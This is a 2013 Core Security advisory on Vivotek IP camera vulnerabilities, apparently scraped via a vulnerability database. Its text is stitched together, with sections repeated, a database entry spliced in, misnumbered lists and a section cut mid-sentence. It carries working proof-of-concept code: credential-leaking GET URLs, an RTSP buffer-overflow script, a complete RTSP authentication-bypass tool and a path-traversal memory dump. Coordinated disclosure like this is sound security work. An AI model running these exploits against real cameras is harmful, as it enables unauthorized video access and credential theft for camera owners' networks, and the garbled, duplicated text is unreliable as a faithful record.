The publication of this advisory was coordinated by Fernando Miranda
from Core Advisories Team.
8. *Technical Description / Proof of Concept Code*
8.1. Sensitive information stored in plain text includes:
. FTP credentials
. Share folder credentials
. SMTP credentials
. WEP / WPA Keys
. DynDNS credentials
. Safe100.net credentials
. TZO credentials, among others.
The following GET requests can exploit the vulnerability (requests may
change according to firmware versions and vendors devices):
/-----
http://192.168.1.100/cgi-bin/admin/getparam.cgi
http://192.168.1.100/setup/parafile.html
-----/
8.2. *Remote Buffer Overflow*
[CVE-2013-1595] The following Python script can be used to trigger the
vulnerability. This script will send to the RTSP service a specially
crafted packet with the header field 'Authorization' fully completed
with the character 'a' (0x61). As a result, the Instruction Pointer
register (IP) will be overwritten with 0x61616161, which is a typical
buffer overrun condition.
/-----
import socket, base64
cam_ip = '192.168.1.100'
session_descriptor = 'live.sdp'
request = 'DESCRIBE rtsp://%s/%s RTSP/1.0\r\n' % (cam_ip,
session_descriptor)
request+= 'CSeq: 1\r\n'
request+= 'Authorization: Basic %s\r\n'
request+= '\r\n'
auth_little = 'a' * 1000
auth_big = 'a' * 10000
msgs = [request % auth_little, request % auth_big]
for msg in msgs:
s = socket.socket()
s.connect((cam_ip, 554))
print s.send(msg)
print s.recv(0x10000)
s.close()
-----/
8.3. *RTSP Authentication Bypass*
[CVE-2013-1596] This vulnerability is triggered by sending specially
crafted RTSP packets to remote TCP port 554 of a Vivotek PT7135 camera.
As a result, the video stream can be accessed by an unauthenticated
remote attacker.
/-----
import sys
from socket import *
from threading import Thread
import time, re
LOGGING = 1
def log(s):
if LOGGING:
print '(%s) %s' % (time.ctime(), s)
class UDPRequestHandler(Thread):
def __init__(self, data_to_send, recv_addr, dst_addr):
Thread.__init__(self)
self.data_to_send = data_to_send
self.recv_addr = recv_addr
self.dst_addr = dst_addr
def run(self):
sender = socket(AF_INET, SOCK_DGRAM)
sender.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
sender.sendto(self.data_to_send, self.dst_addr)
response = sender.recv(1024)
sender.sendto(response, self.recv_addr)
sender.close()
class UDPDispatcher(Thread):
dispatchers = []
def __has_dispatcher_for(self, port):
return any([d.src_port == port for d in UDPDispatcher.dispatchers])
def __init__(self, src_port, dst_addr):
Thread.__init__(self)
if self.__has_dispatcher_for(src_port):
raise Exception('There is already a dispatcher for port %d'
% src_port)
self.src_port = src_port
self.dst_addr = dst_addr
UDPDispatcher.dispatchers.append(self)
def run(self):
listener = socket(AF_INET, SOCK_DGRAM)
listener.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
listener.bind(('', self.src_port))
while 1:
try:
data, recv_addr = listener.recvfrom(1024)
if not data: break
UDPRequestHandler(data, recv_addr, self.dst_addr).start()
except Exception as e:
print e
break
listener.close()
UDPDispatcher.dispatchers.remove( self )
class PipeThread(Thread):
pipes = []
def __init__(self, source, sink, process_data_callback=lambda x: x):
Thread.__init__(self)
self.source = source
self.sink = sink
self.process_data_callback = process_data_callback
PipeThread.pipes.append(self)
def run(self):
while 1:
try:
data = self.source.recv(1024)
data = self.process_data_callback(data)
if not data: break
self.sink.send( data )
except Exception as e:
log(e)
break
PipeThread.pipes.remove(self)
class TCPTunnel(Thread):
def __init__(self, src_port, dst_addr, process_data_callback=lambda
x: x):
Thread.__init__(self)
log('[*] Redirecting: localhost:%s -> %s:%s' % (src_port,
dst_addr[0], dst_addr[1]))
self.dst_addr = dst_addr
self.process_data_callback = process_data_callback
# Create TCP listener socket
self.sock = socket(AF_INET, SOCK_STREAM)
self.sock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
self.sock.bind(('', src_port))
self.sock.listen(5)
def run(self):
while 1:
# Wait until a new connection arises
newsock, address = self.sock.accept()
# Create forwarder socket
fwd = socket(AF_INET, SOCK_STREAM)
fwd.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
fwd.connect(self.dst_addr)
# Pipe them!
PipeThread(newsock, fwd, self.process_data_callback).start()
PipeThread(fwd, newsock, self.process_data_callback).start()
class Camera():
def __init__(self, address):
self.address = address
def get_describe_data(self):
return ''
class Vivotek(Camera):
# Vivotek PT7135/0400a
def __init__(self, address):
Camera.__init__(self, address)
def get_describe_data(self):
return 'v=0\r\no=RTSP 836244 0 IN IP4 0.0.0.0\r\ns=RTSP
server\r\nc=IN IP4 0.0.0.0\r\nt=0
0\r\na=charset:Shift_JIS\r\na=range:npt=0-\r\na=control:*\r\na=etag:1234567890\r\nm=video
0 RTP/AVP 96\r\nb=AS:1200\r\na=rtpmap:96
MP4V-ES/30000\r\na=control:trackID=1\r\na=fmtp:96
profile-level-id=3;config=000001B003000001B509000001000000012000C48881F4514043C1463F;decode_buf=76800\r\nm=audio
0 RTP/AVP 97\r\na=control:trackID=3\r\na=rtpmap:97
mpeg4-generic/16000/2\r\na=fmtp:97 streamtype=5; profile-level-id=15;
mode=AAC-hbr; config=1410;SizeLength=13; IndexLength=3;
IndexDeltaLength=3; CTSDeltaLength=0; DTSDeltaLength=0;\r\n'
class RTSPAuthByPasser():
DESCRIBE_REQ_HEADER = 'DESCRIBE rtsp://'
UNAUTHORIZED_RESPONSE = 'RTSP/1.0 401 Unauthorized'
SERVER_PORT_ARGUMENTS = 'server_port='
DEFAULT_CSEQ = 1
DEFAULT_SERVER_PORT_RANGE = '5556-5559'
def __init__(self, local_port, camera):
self.last_describe_req = ''
self.camera = camera
self.local_port = local_port
def start(self):
log('[!] Starting bypasser')
TCPTunnel(self.local_port, self.camera.address,
self.spoof_rtsp_conn).start()
def spoof_rtsp_conn(self, data):
if RTSPAuthByPasser.DESCRIBE_REQ_HEADER in data:
self.last_describe_req = data
elif RTSPAuthByPasser.UNAUTHORIZED_RESPONSE in data and
self.last_describe_req:
log('[!] Unauthorized response received. Spoofing...')
spoofed_describe = self.camera.get_describe_data()
# Look for the request CSeq
m = re.search('.*CSeq:\\s*(\\d+?)\r\n.*',
self.last_describe_req)
cseq = m.group(1) if m else RTSPAuthByPasser.DEFAULT_CSEQ
# Create the response
data = 'RTSP/1.0 200 OK\r\n'
data+= 'CSeq: %s\r\n' % cseq
data+= 'Content-Type: application/sdp\r\n'
data+= 'Content-Length: %d\r\n' % len(spoofed_describe)
data+= '\r\n'
# Attach the spoofed describe
data+= spoofed_describe
elif RTSPAuthByPasser.SERVER_PORT_ARGUMENTS in data:
# Look for the server RTP ports
m = re.search('.*%s\\s*(.+?)[;|\r].*' %
RTSPAuthByPasser.SERVER_PORT_ARGUMENTS, data)
ports = m.group(1) if m else
RTSPAuthByPasser.DEFAULT_SERVER_PORT_RANGE
# For each port in the range create a UDP dispatcher
begin_port, end_port = map(int, ports.split('-'))
for udp_port in xrange(begin_port, end_port + 1):
try:
UDPDispatcher(udp_port, (self.camera.address[0],
udp_port)).start()
except:
pass
return data
if __name__ == '__main__':
if len( sys.argv ) > 1:
listener_port = camera_port = int(sys.argv[1])
camera_ip = sys.argv[2]
if len(sys.argv) == 4:
camera_port = int(sys.argv[3])
RTSPAuthByPasser(listener_port, Vivotek((camera_ip,
camera_port))).start()
else:
print 'usage: python %s [local_port] [camera_ip]
[camera_rtsp_port]'
-----/
8.4. *User Credentials Leaked via Path Traversal*
[CVE-2013-1597] The following Python code exploits a path traversal and
dumps the camera's memory. Valid user credentials can be extracted from
this memory dump by an unauthenticated remote attacker (firmware 0300a).
The same attack is still valid with firmware 0400a but the user has to
be authenticated in order to exploit this flaw.
/-----
import httplib
conn = httplib.HTTPConnection("192.168.1.100")
conn.request("GET", "/../../../../../../../../../proc/kcore")
resp = conn.getresponse()
data = resp.read()
-----/
8.5. *OS Command Injection*
[CVE-2013-1598] The command injection is located in the binary file
'farseer.out' in the parameter 'system.ntp':
/-----
.text:0000CB34 MOV R1, R4
.text:0000CB38 LDR R0, =aCmdporcessStar ;
"[CmdPorcess] Start sync with NTP server %s"...
.text:0000CB3C ADD R10, SP, #0x144+var_120
.text:0000CB40 BNE loc_CB68
[...]
.text:0000CB68 BL .printf
.text:0000CB6C LDR R2, =aSS_0 ; "%s%s"
.text:0000CB70 LDR R3, =aUsrSbinPsntpda ;
"/usr/sbin/psntpdate -4fr "
.text:0000CB74 MOV R1, #0xFF ; maxlen
.text:0000CB78 MOV R0, R10 ; s
.text:0000CB7C STR R4, [SP,#0x144+var_144]
.text:0000CB80 BL .snprintf
.text:0000CB84 MOV R0, R10 ; command
.text:0000CB88 BL .system
-----/
9. *Report Timeline*
. 2013-03-06:
Core Security Technologies notifies the Vivotek Customer Support of the
vulnerability (tracking ID CRM:00930113) and requests a security manager
to send a draft report regarding these vulnerabilities. No reply received. 2013-03-11:
Core asks for a security manager to send a confidential report. 2013-03-14:
Core notifies the Vivotek Technical Support of the vulnerability
(tracking ID CRM:00930485). 2013-03-18:
Core opens a new ticket in the Vivotek Technical Support (tracking ID
CRM:00930670). 2013-03-21:
Core asks for a reply regarding the tracking ID CRM:00930485. 2013-04-24:
Core tries to contact vendor for last time without any reply. 2013-04-29:
After 6 failed attempts to report the issues, the advisory
CORE-2013-0301 is published as 'user-release'.
10. *References*
[1] http://www.vivotek.com/web/product/NetworkCameras.aspx
[2] http://www.securityfocus.com/bid/54476.
[3] Alejandro Leon Morales [Gothicx] http://www.undermx.blogspot.mx.
11. *About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.
12. *About Core Security Technologies*
Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and demonstrate real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.
13. *Disclaimer*
The contents of this advisory are copyright (c) 2012 Core Security
Technologies and (c) 2012 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
14. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc
| VAR-202001-0836 | CVE-2013-1596 |
Vivotek Network Cameras Information Disclosure Vulnerability
Related entries in the VARIoT exploits database: VAR-E-201207-0004 |
CVSS V2: 5.0 CVSS V3: 5.3 Severity: MEDIUM |
An Authentication Bypass Vulnerability exists in Vivotek PT7135 IP Camera 0300a and 0400a via specially crafted RTSP packets to TCP port 554. Vivotek PT7135 IP Camera Contains an authentication vulnerability.Information may be obtained. Vivotek Network Cameras is a wireless network camera. Vivotek Network Cameras failed to properly handle user-submitted requests, allowing remote attackers to submit malicious requests for sensitive information such as FTP and DYNDNS.
Successful exploits will allow a remote attacker to gain access to sensitive information. Information obtained will aid in further attacks. *Advisory Information*
Title: Vivotek IP Cameras Multiple Vulnerabilities
Advisory ID: CORE-2013-0301
Advisory URL:
http://www.coresecurity.com/advisories/vivotek-ip-cameras-multiple-vulnerabilities
Date published: 2013-04-29
Date of last update: 2013-04-29
Vendors contacted: Vivotek
Release mode: User release
2. *Vulnerability Information*
Class: Information leak through GET request [CWE-598], Buffer overflow
[CWE-119], Authentication issues [CWE-287], Path traversal [CWE-22], OS
command injection [CWE-78]
Impact: Code execution, Security bypass
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2013-1594, CVE-2013-1595, CVE-2013-1596, CVE-2013-1597,
CVE-2013-1598
3. [CVE-2013-1594] to process GET requests that contain sensitive
information,
2. [CVE-2013-1595] to execute arbitrary code,
3. [CVE-2013-1596] to access the video stream via RTSP,
4. [CVE-2013-1597] to dump the camera's memory and retrieve user
credentials,
5. [CVE-2013-1598] to execute arbitrary commands from the
administration web interface (pre-authentication with firmware 0300a and
post-authentication with firmware 0400a).
4. *Vulnerable Packages*
. Other Vivotek cameras/firmware are probably affected too, but they
were not checked.
5. *Non-Vulnerable Packages*
Vendor did not provide details. Contact Vivotek for further information.
6. *Vendor Information, Solutions and Workarounds*
There was no official answer from Vivotek after several attempts to
report these vulnerabilities (see [Sec. 9]). Contact vendor for further
information.
Some mitigation actions may be:
. Do not expose the camera to internet unless absolutely necessary. Filter RTSP traffic (default port 554) if possible. Have at least one proxy filtering '/../../' and 'getparam.cgi' in
HTTP requests. Filter strings in the parameter 'system.ntp' on every request made
to the binary 'farseer.out'.
7. *Credits*
[CVE-2013-1594] was originally discovered and reported [2] by Alejandro
Leon Morales [3] and re-discovered on new firmware versions by Flavio De
Cristofaro from Core Security.
[CVE-2013-1595] and [CVE-2013-1596] were discovered and researched by
Martin Rocha from Core Impact Pro Team. The PoC of [CVE-2013-1596] was
made by Martin Rocha with help of Juan Cotta from Core QA Team.
[CVE-2013-1597] and [CVE-2013-1598] were discovered and researched by
Francisco Falcon and Nahuel Riva from Core Exploit Writers Team.
The publication of this advisory was coordinated by Fernando Miranda
from Core Advisories Team.
8. *Technical Description / Proof of Concept Code*
8.1. Sensitive information stored in plain text includes:
. FTP credentials
. Share folder credentials
. SMTP credentials
. WEP / WPA Keys
. DynDNS credentials
. Safe100.net credentials
. TZO credentials, among others.
The following GET requests can exploit the vulnerability (requests may
change according to firmware versions and vendors devices):
/-----
http://192.168.1.100/cgi-bin/admin/getparam.cgi
http://192.168.1.100/setup/parafile.html
-----/
8.2. *Remote Buffer Overflow*
[CVE-2013-1595] The following Python script can be used to trigger the
vulnerability. This script will send to the RTSP service a specially
crafted packet with the header field 'Authorization' fully completed
with the character 'a' (0x61). As a result, the Instruction Pointer
register (IP) will be overwritten with 0x61616161, which is a typical
buffer overrun condition.
/-----
import socket, base64
cam_ip = '192.168.1.100'
session_descriptor = 'live.sdp'
request = 'DESCRIBE rtsp://%s/%s RTSP/1.0\r\n' % (cam_ip,
session_descriptor)
request+= 'CSeq: 1\r\n'
request+= 'Authorization: Basic %s\r\n'
request+= '\r\n'
auth_little = 'a' * 1000
auth_big = 'a' * 10000
msgs = [request % auth_little, request % auth_big]
for msg in msgs:
s = socket.socket()
s.connect((cam_ip, 554))
print s.send(msg)
print s.recv(0x10000)
s.close()
-----/
8.3.
As a result, the video stream can be accessed by an unauthenticated
remote attacker.
/-----
import sys
from socket import *
from threading import Thread
import time, re
LOGGING = 1
def log(s):
if LOGGING:
print '(%s) %s' % (time.ctime(), s)
class UDPRequestHandler(Thread):
def __init__(self, data_to_send, recv_addr, dst_addr):
Thread.__init__(self)
self.data_to_send = data_to_send
self.recv_addr = recv_addr
self.dst_addr = dst_addr
def run(self):
sender = socket(AF_INET, SOCK_DGRAM)
sender.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
sender.sendto(self.data_to_send, self.dst_addr)
response = sender.recv(1024)
sender.sendto(response, self.recv_addr)
sender.close()
class UDPDispatcher(Thread):
dispatchers = []
def __has_dispatcher_for(self, port):
return any([d.src_port == port for d in UDPDispatcher.dispatchers])
def __init__(self, src_port, dst_addr):
Thread.__init__(self)
if self.__has_dispatcher_for(src_port):
raise Exception('There is already a dispatcher for port %d'
% src_port)
self.src_port = src_port
self.dst_addr = dst_addr
UDPDispatcher.dispatchers.append(self)
def run(self):
listener = socket(AF_INET, SOCK_DGRAM)
listener.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
listener.bind(('', self.src_port))
while 1:
try:
data, recv_addr = listener.recvfrom(1024)
if not data: break
UDPRequestHandler(data, recv_addr, self.dst_addr).start()
except Exception as e:
print e
break
listener.close()
UDPDispatcher.dispatchers.remove( self )
class PipeThread(Thread):
pipes = []
def __init__(self, source, sink, process_data_callback=lambda x: x):
Thread.__init__(self)
self.source = source
self.sink = sink
self.process_data_callback = process_data_callback
PipeThread.pipes.append(self)
def run(self):
while 1:
try:
data = self.source.recv(1024)
data = self.process_data_callback(data)
if not data: break
self.sink.send( data )
except Exception as e:
log(e)
break
PipeThread.pipes.remove(self)
class TCPTunnel(Thread):
def __init__(self, src_port, dst_addr, process_data_callback=lambda
x: x):
Thread.__init__(self)
log('[*] Redirecting: localhost:%s -> %s:%s' % (src_port,
dst_addr[0], dst_addr[1]))
self.dst_addr = dst_addr
self.process_data_callback = process_data_callback
# Create TCP listener socket
self.sock = socket(AF_INET, SOCK_STREAM)
self.sock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
self.sock.bind(('', src_port))
self.sock.listen(5)
def run(self):
while 1:
# Wait until a new connection arises
newsock, address = self.sock.accept()
# Create forwarder socket
fwd = socket(AF_INET, SOCK_STREAM)
fwd.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
fwd.connect(self.dst_addr)
# Pipe them!
PipeThread(newsock, fwd, self.process_data_callback).start()
PipeThread(fwd, newsock, self.process_data_callback).start()
class Camera():
def __init__(self, address):
self.address = address
def get_describe_data(self):
return ''
class Vivotek(Camera):
# Vivotek PT7135/0400a
def __init__(self, address):
Camera.__init__(self, address)
def get_describe_data(self):
return 'v=0\r\no=RTSP 836244 0 IN IP4 0.0.0.0\r\ns=RTSP
server\r\nc=IN IP4 0.0.0.0\r\nt=0
0\r\na=charset:Shift_JIS\r\na=range:npt=0-\r\na=control:*\r\na=etag:1234567890\r\nm=video
0 RTP/AVP 96\r\nb=AS:1200\r\na=rtpmap:96
MP4V-ES/30000\r\na=control:trackID=1\r\na=fmtp:96
profile-level-id=3;config=000001B003000001B509000001000000012000C48881F4514043C1463F;decode_buf=76800\r\nm=audio
0 RTP/AVP 97\r\na=control:trackID=3\r\na=rtpmap:97
mpeg4-generic/16000/2\r\na=fmtp:97 streamtype=5; profile-level-id=15;
mode=AAC-hbr; config=1410;SizeLength=13; IndexLength=3;
IndexDeltaLength=3; CTSDeltaLength=0; DTSDeltaLength=0;\r\n'
class RTSPAuthByPasser():
DESCRIBE_REQ_HEADER = 'DESCRIBE rtsp://'
UNAUTHORIZED_RESPONSE = 'RTSP/1.0 401 Unauthorized'
SERVER_PORT_ARGUMENTS = 'server_port='
DEFAULT_CSEQ = 1
DEFAULT_SERVER_PORT_RANGE = '5556-5559'
def __init__(self, local_port, camera):
self.last_describe_req = ''
self.camera = camera
self.local_port = local_port
def start(self):
log('[!] Starting bypasser')
TCPTunnel(self.local_port, self.camera.address,
self.spoof_rtsp_conn).start()
def spoof_rtsp_conn(self, data):
if RTSPAuthByPasser.DESCRIBE_REQ_HEADER in data:
self.last_describe_req = data
elif RTSPAuthByPasser.UNAUTHORIZED_RESPONSE in data and
self.last_describe_req:
log('[!] Unauthorized response received. Spoofing...')
spoofed_describe = self.camera.get_describe_data()
# Look for the request CSeq
m = re.search('.*CSeq:\\s*(\\d+?)\r\n.*',
self.last_describe_req)
cseq = m.group(1) if m else RTSPAuthByPasser.DEFAULT_CSEQ
# Create the response
data = 'RTSP/1.0 200 OK\r\n'
data+= 'CSeq: %s\r\n' % cseq
data+= 'Content-Type: application/sdp\r\n'
data+= 'Content-Length: %d\r\n' % len(spoofed_describe)
data+= '\r\n'
# Attach the spoofed describe
data+= spoofed_describe
elif RTSPAuthByPasser.SERVER_PORT_ARGUMENTS in data:
# Look for the server RTP ports
m = re.search('.*%s\\s*(.+?)[;|\r].*' %
RTSPAuthByPasser.SERVER_PORT_ARGUMENTS, data)
ports = m.group(1) if m else
RTSPAuthByPasser.DEFAULT_SERVER_PORT_RANGE
# For each port in the range create a UDP dispatcher
begin_port, end_port = map(int, ports.split('-'))
for udp_port in xrange(begin_port, end_port + 1):
try:
UDPDispatcher(udp_port, (self.camera.address[0],
udp_port)).start()
except:
pass
return data
if __name__ == '__main__':
if len( sys.argv ) > 1:
listener_port = camera_port = int(sys.argv[1])
camera_ip = sys.argv[2]
if len(sys.argv) == 4:
camera_port = int(sys.argv[3])
RTSPAuthByPasser(listener_port, Vivotek((camera_ip,
camera_port))).start()
else:
print 'usage: python %s [local_port] [camera_ip]
[camera_rtsp_port]'
-----/
8.4. *User Credentials Leaked via Path Traversal*
[CVE-2013-1597] The following Python code exploits a path traversal and
dumps the camera's memory. Valid user credentials can be extracted from
this memory dump by an unauthenticated remote attacker (firmware 0300a).
The same attack is still valid with firmware 0400a but the user has to
be authenticated in order to exploit this flaw.
/-----
import httplib
conn = httplib.HTTPConnection("192.168.1.100")
conn.request("GET", "/../../../../../../../../../proc/kcore")
resp = conn.getresponse()
data = resp.read()
-----/
8.5. *OS Command Injection*
[CVE-2013-1598] The command injection is located in the binary file
'farseer.out' in the parameter 'system.ntp':
/-----
.text:0000CB34 MOV R1, R4
.text:0000CB38 LDR R0, =aCmdporcessStar ;
"[CmdPorcess] Start sync with NTP server %s"...
.text:0000CB3C ADD R10, SP, #0x144+var_120
.text:0000CB40 BNE loc_CB68
[...]
.text:0000CB68 BL .printf
.text:0000CB6C LDR R2, =aSS_0 ; "%s%s"
.text:0000CB70 LDR R3, =aUsrSbinPsntpda ;
"/usr/sbin/psntpdate -4fr "
.text:0000CB74 MOV R1, #0xFF ; maxlen
.text:0000CB78 MOV R0, R10 ; s
.text:0000CB7C STR R4, [SP,#0x144+var_144]
.text:0000CB80 BL .snprintf
.text:0000CB84 MOV R0, R10 ; command
.text:0000CB88 BL .system
-----/
9. *Report Timeline*
. 2013-03-06:
Core Security Technologies notifies the Vivotek Customer Support of the
vulnerability (tracking ID CRM:00930113) and requests a security manager
to send a draft report regarding these vulnerabilities. No reply received. 2013-03-11:
Core asks for a security manager to send a confidential report. 2013-03-14:
Core notifies the Vivotek Technical Support of the vulnerability
(tracking ID CRM:00930485). 2013-03-18:
Core opens a new ticket in the Vivotek Technical Support (tracking ID
CRM:00930670). 2013-03-21:
Core asks for a reply regarding the tracking ID CRM:00930485. 2013-04-24:
Core tries to contact vendor for last time without any reply. 2013-04-29:
After 6 failed attempts to report the issues, the advisory
CORE-2013-0301 is published as 'user-release'.
10. *References*
[1] http://www.vivotek.com/web/product/NetworkCameras.aspx
[2] http://www.securityfocus.com/bid/54476.
[3] Alejandro Leon Morales [Gothicx] http://www.undermx.blogspot.mx.
11. *About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.
12. *About Core Security Technologies*
Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and demonstrate real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.
13. *Disclaimer*
The contents of this advisory are copyright (c) 2012 Core Security
Technologies and (c) 2012 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
14. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc